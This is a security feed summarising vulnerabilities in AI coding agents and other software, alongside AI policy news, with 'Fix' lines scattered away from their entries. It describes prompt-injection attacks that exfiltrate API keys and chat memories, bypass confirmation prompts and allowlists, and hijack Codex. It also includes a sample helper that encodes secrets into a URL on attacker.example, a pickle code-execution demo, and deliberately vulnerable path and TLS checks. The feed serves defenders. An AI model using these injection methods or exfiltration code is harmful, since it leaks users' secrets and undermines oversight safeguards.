All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Claude Code is an agentic coding tool (software that can automatically write and execute code). In versions before 1.0.20, a flaw in how the tool parses commands allows attackers to skip the confirmation prompt that normally protects users before running untrusted code. Exploiting this requires the attacker to insert malicious content into Claude Code's input.
Fix: This is fixed in version 1.0.20. Users should update Claude Code to version 1.0.20 or later.
NVD/CVE Database

Claude Code, an agentic coding tool (software that can write and modify code automatically), has a path validation flaw in versions before 0.2.111 that allows attackers to bypass directory restrictions and access files outside the intended working directory. The vulnerability exploits prefix matching (checking if one string starts with another) instead of properly comparing full file paths, and requires the attacker to create a directory with the same prefix name and inject untrusted content into the tool's context.
Cursor, a code editor designed for AI-assisted programming, has a vulnerability in versions below 1.3.9 where it can write files in a workspace without asking the user for permission. An attacker can exploit this by using prompt injection (tricking the AI by hiding instructions in its input) to create sensitive configuration files like .cursor/mcp.json, potentially gaining RCE (remote code execution, where an attacker can run commands on a system they don't own) on the victim's computer without approval.
Cursor, a code editor designed for AI-assisted programming, has a vulnerability in versions before 1.3.9 where it can write files to a workspace without asking the user for permission. An attacker can exploit this by using prompt injection (tricking the AI by hiding instructions in its input) combined with this flaw to modify editor configuration files and achieve RCE (remote code execution, where an attacker can run commands on a system they don't own) without the user's knowledge.
Cursor IDE (an AI-powered code editor) has a vulnerability where it can render Mermaid diagrams (a tool for creating flowcharts and diagrams from simple text) that include external image requests without user confirmation. An attacker can use prompt injection (tricking the AI by hiding malicious instructions in code comments or other inputs) to embed image URLs in these diagrams, allowing them to steal sensitive data like API keys or user memories by encoding that information in the URL sent to an attacker-controlled server.
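The exfiltration channel itself is simple: the secret is packed into the query string of an image URL, and the attacker's web server records it in its access logs when the diagram is rendered and the image is fetched. A minimal sketch of that encoding step (the attacker.example host and exfil_url helper are hypothetical, for illustration only):

```python
from urllib.parse import quote

def exfil_url(secret: str, server: str = "https://attacker.example/pixel.png") -> str:
    # URL-encode the stolen value into a query parameter; when the
    # diagram renderer fetches the "image", the request (including the
    # secret) lands in the attacker's server logs.
    return f"{server}?d={quote(secret)}"

url = exfil_url("api key: sk-1234")
```

This is why agentic tools should require confirmation before fetching external resources referenced by model output.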
Anthropic's filesystem MCP server (a tool that lets AI assistants like Claude access your computer's files) had a path validation vulnerability where it only checked if a file path started with an allowed directory name, rather than confirming it was actually in that directory. This meant if you allowed access to /mnt/finance/data, the AI could also access sibling files like /mnt/finance/data-archived because the path string starts the same way.
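The flawed check and a safer alternative can be sketched in a few lines (a simplified illustration using the paths from the example above, not Anthropic's actual code):

```python
import os

ALLOWED = "/mnt/finance/data"

def allowed_naive(path: str) -> bool:
    # Buggy: "/mnt/finance/data-archived" also starts with the allowed
    # prefix string, so a sibling directory passes the check.
    return path.startswith(ALLOWED)

def allowed_fixed(path: str) -> bool:
    # Compare whole path components instead of raw string prefixes,
    # after normalizing the candidate path.
    real = os.path.realpath(path)
    return os.path.commonpath([real, ALLOWED]) == ALLOWED
```

With this fix, `/mnt/finance/data/report.csv` is still allowed, while `/mnt/finance/data-archived/q3.csv` is rejected because its first diverging component differs from the allowed directory.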
1Panel is a web management tool that controls websites, files, containers (isolated software environments), databases, and AI models on Linux servers. In versions 2.0.5 and earlier, the tool's HTTPS connection (encrypted communication) between its core system and agent components doesn't fully verify certificates (digital identification documents), allowing attackers to gain unauthorized access and execute arbitrary commands on the server.
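The underlying anti-pattern is a TLS client that skips certificate and hostname verification. A short illustration using Python's standard ssl module (a generic sketch of the pattern, not 1Panel's actual code):

```python
import ssl

# A properly verifying client context: the certificate chain and the
# hostname are both checked (this is Python's default). A deployment
# with a private CA would additionally call ctx.load_verify_locations().
ctx = ssl.create_default_context()

# The vulnerable pattern: verification switched off, so any certificate,
# including an attacker's, is accepted. Note the order: check_hostname
# must be disabled before verify_mode can be lowered to CERT_NONE.
insecure = ssl.create_default_context()
insecure.check_hostname = False
insecure.verify_mode = ssl.CERT_NONE
```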
Cursor, a code editor that uses AI to help with programming, has a vulnerability in versions below 1.3 where Mermaid (a diagram rendering tool) can embed images that leak sensitive information to an attacker's server. An attacker could exploit this by using prompt injection (tricking the AI by hiding instructions in its input) through malicious data like websites, uploaded images, or source code, potentially stealing data when the images are fetched.
Cursor, a code editor designed for AI-assisted programming, has a vulnerability in versions below 1.3. If a user changes Cursor's default settings to use an allowlist (a list of approved commands), an attacker can bypass this protection by using backtick (`) or $(cmd) command-substitution syntax to run arbitrary commands (unrestricted code execution) without permission, especially when combined with indirect prompt injection (tricking the AI through hidden instructions in its input).
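A naive allowlist that only inspects the command name shows why substitution syntax slips through (a simplified sketch of the general bug class, not Cursor's implementation):

```python
import shlex

ALLOWLIST = {"ls", "echo", "cat"}

def naive_allows(command: str) -> bool:
    # Buggy: only the first token is checked, so substitution syntax
    # embedded in the arguments ("`...`" or "$(...)") runs anyway when
    # a shell executes the command.
    return shlex.split(command)[0] in ALLOWLIST

def safer_allows(command: str) -> bool:
    # Reject shell metacharacters outright before the allowlist check
    # (still only a sketch; a robust policy needs a real shell parser).
    if any(tok in command for tok in ("`", "$(", "|", ";", "&")):
        return False
    return shlex.split(command)[0] in ALLOWLIST
```

Here `echo \`whoami\`` passes the naive check because "echo" is allowlisted, even though the shell would execute the embedded `whoami`.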
CVE-2025-45150 is a vulnerability in LangChain-ChatGLM-Webui (a tool that combines language models with a web interface) caused by insecure permissions (CWE-732, which means access controls are set incorrectly on important resources). Attackers can exploit this flaw by sending specially crafted requests to view and download sensitive files they shouldn't be able to access.
The modelscope/ms-swift library up to version 2.6.1 has a critical vulnerability where it unsafely deserializes (reconstructs objects from saved data) untrusted files using pickle.load(), a Python function that can run arbitrary code during deserialization. Attackers can exploit this by tricking users into loading a malicious checkpoint file during model training, executing code on their machine while keeping the training process running normally so the user doesn't notice the attack.
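The mechanism is pickle's `__reduce__` hook, which lets a crafted file name any callable for the loader to invoke during deserialization. A harmless demonstration of the pattern (a generic sketch, not the ms-swift exploit; print stands in for something like os.system):

```python
import io
import pickle

class MaliciousCheckpoint:
    """Looks like saved training state but hijacks deserialization."""
    def __reduce__(self):
        # pickle calls this callable with these arguments during load.
        # A harmless print stands in for e.g. os.system("...").
        return (print, ("arbitrary code ran during pickle.load()",))

blob = pickle.dumps(MaliciousCheckpoint())
loaded = pickle.load(io.BytesIO(blob))  # the side effect fires here
```

This is why untrusted model checkpoints should be loaded with safe formats (such as safetensors) rather than pickle-based ones.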
A WordPress plugin called 'Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery' has a stored cross-site scripting vulnerability (XSS, a security flaw where attackers inject malicious code into a website that runs when others visit it) in its comment feature through version 26.1.0. Because the plugin doesn't properly clean and validate user input, unauthenticated attackers can inject harmful scripts that will execute for anyone viewing the affected pages.
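The missing step in this bug class is output escaping: user input must be HTML-escaped before being rendered into the page. A minimal sketch (render_comment is a hypothetical helper, not the plugin's code, which is PHP):

```python
import html

def render_comment(raw: str) -> str:
    # Escape user-supplied text before inserting it into markup, so an
    # injected <script> tag renders as inert text instead of executing.
    return f'<p class="comment">{html.escape(raw)}</p>'

out = render_comment("<script>alert(1)</script>")
```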
On July 18, 2025, the European Commission released draft Guidelines that explain how the EU AI Act applies to General Purpose AI models (GPAI, which are flexible AI systems that can handle many different tasks). The Guidelines define GPAI models based on a compute threshold (10²³ FLOPs, or floating point operations, a measure of total training computation that grows with both model size and training data size), require providers to document their models and report serious incidents, and impose stricter obligations on very large models trained with 10²⁵ FLOPs or more. Providers of these large models must notify the Commission within two weeks and can request reassessment of their systemic risk classification if they provide evidence the model is not actually risky.
The Code of Practice is a framework that helps developers of General Purpose AI models (large AI systems designed for many different tasks) comply with EU AI Act requirements, though following it is voluntary. New GPAI models released after August 2, 2025 must comply immediately, while older models have until August 2, 2027, with enforcement actions delayed until August 2, 2026 to give developers time to adjust.
The dedupe Python library (which uses machine learning for fuzzy matching, deduplication, and entity resolution on structured data) had a critical vulnerability in its GitHub Actions workflow that allowed attackers to trigger code execution by commenting @benchmark on pull requests, potentially exposing the GITHUB_TOKEN (a credential that grants access to modify repository contents) and leading to repository takeover.
BentoML versions 1.4.0 to 1.4.19 have an SSRF vulnerability (server-side request forgery, where an attacker tricks a server into making requests to internal or restricted addresses) in their file upload feature. An unauthenticated attacker can exploit this to force the server to download files from any URL, including internal network addresses and cloud metadata endpoints (services that store sensitive information), without any validation.
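The missing validation amounts to resolving the requested host and refusing private, loopback, and link-local targets (the range that includes the 169.254.169.254 cloud metadata endpoint). A simplified sketch of such a check, not BentoML's actual fix:

```python
import ipaddress
import socket
from urllib.parse import urlparse

def url_is_safe(url: str) -> bool:
    # Only allow http(s), resolve the host, and reject addresses that
    # point into the server's own network (private ranges, loopback,
    # and link-local, which covers 169.254.169.254 metadata services).
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    try:
        addr = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
    except (socket.gaierror, ValueError):
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)
```

Note that a complete defense also has to handle redirects and DNS rebinding, which this sketch does not.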
Fix: Update Claude Code to version 0.2.111 or later, as this version contains the fix for the path validation flaw.
NVD/CVE Database

Fix: Update Cursor to version 1.3.9 or later, where this vulnerability is fixed.

NVD/CVE Database

Fix: Update Cursor to version 1.3.9 or later, where this vulnerability is fixed.

NVD/CVE Database

Differential privacy (DP, a mathematical technique that adds controlled randomness to data to protect individual privacy while keeping data useful) is a widely-used method for protecting sensitive information, but putting it into practice in real-world systems has proven difficult. Researchers analyzed 21 actual deployments of differential privacy by major companies and institutions over the last ten years to understand what works and what doesn't.
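The core of DP in such deployments is noise calibration: for the classic Laplace mechanism, the noise scale is the query's sensitivity divided by the privacy budget epsilon, so a smaller epsilon (stronger privacy) forces wider noise. A minimal sketch of a differentially private count (a textbook illustration, not any deployment's code):

```python
import math
import random

def laplace_scale(sensitivity: float, epsilon: float) -> float:
    # Calibration rule of the Laplace mechanism: b = sensitivity / epsilon.
    return sensitivity / epsilon

def dp_count(true_count: int, epsilon: float, rng: random.Random) -> float:
    # A counting query changes by at most 1 when one record is added or
    # removed, so its sensitivity is 1. Sample Laplace(0, b) by inverting
    # its CDF on a uniform draw u in (-0.5, 0.5).
    b = laplace_scale(1.0, epsilon)
    u = rng.random() - 0.5
    return true_count - b * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))

noisy = dp_count(100, epsilon=1.0, rng=random.Random(0))
```

The papers' point is that the hard part in practice is everything around this formula: choosing epsilon, bounding sensitivity, and accounting for repeated queries.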
Fix: Anthropic rewrote the filesystem server to support the roots feature of MCP, and this updated release fixed the vulnerability. The vulnerability is tracked as CVE-2025-53109.
Embrace The Red

ChatGPT Codex, a cloud-based AI tool that answers code questions and writes software, is vulnerable to prompt injection (tricking an AI by hiding instructions in its input) attacks that can turn it into a botnet (a network of compromised computers controlled remotely). An attacker can exploit the "Common Dependencies Allowlist" feature, which allows Codex internet access to certain approved servers, by hosting malicious code on Azure and injecting fake instructions into GitHub issues to hijack Codex and steal sensitive data or run malware.
Fix: Review the allowlist for the Dependency Set and apply a fine-grained approach. OpenAI recommends only using a self-defined allowlist when enabling Internet access, as Codex's access can be configured at a very granular level. Additionally, consider installing EDR (endpoint detection and response, security software that monitors suspicious activity) and other monitoring software on AI agents to track their behavior and detect if malware is installed.
Embrace The Red

Fix: Fixed in version 2.0.6. Users should update to this version or later.
NVD/CVE Database

Fix: This issue is fixed in version 1.3. Users should update Cursor to version 1.3 or later.

NVD/CVE Database

Fix: This is fixed in version 1.3.

NVD/CVE Database

A researcher discovered that ChatGPT's 'safe URL' feature, which is supposed to prevent data theft, can be bypassed using prompt injection (tricking an AI by hiding malicious instructions in its input). By exploiting this bypass, an attacker can trick ChatGPT into sending sensitive information like your chat history and memories to a server they control, especially if you ask ChatGPT to process untrusted content like PDFs or websites.
The Trump Administration released an AI Action Plan with policies across three areas: accelerating innovation, building infrastructure, and international leadership. While the plan primarily focuses on speeding up US AI development, it also includes several AI safety policies such as investing in AI interpretability (how AI systems make decisions), building evaluation systems to test AI safety, strengthening cybersecurity, and controlling exports of powerful AI chips.
Fix: This is fixed by commit 3f61e79.
NVD/CVE Database

Fix: Upgrade to version 1.4.19 or later, which contains a patch for the issue.
NVD/CVE Database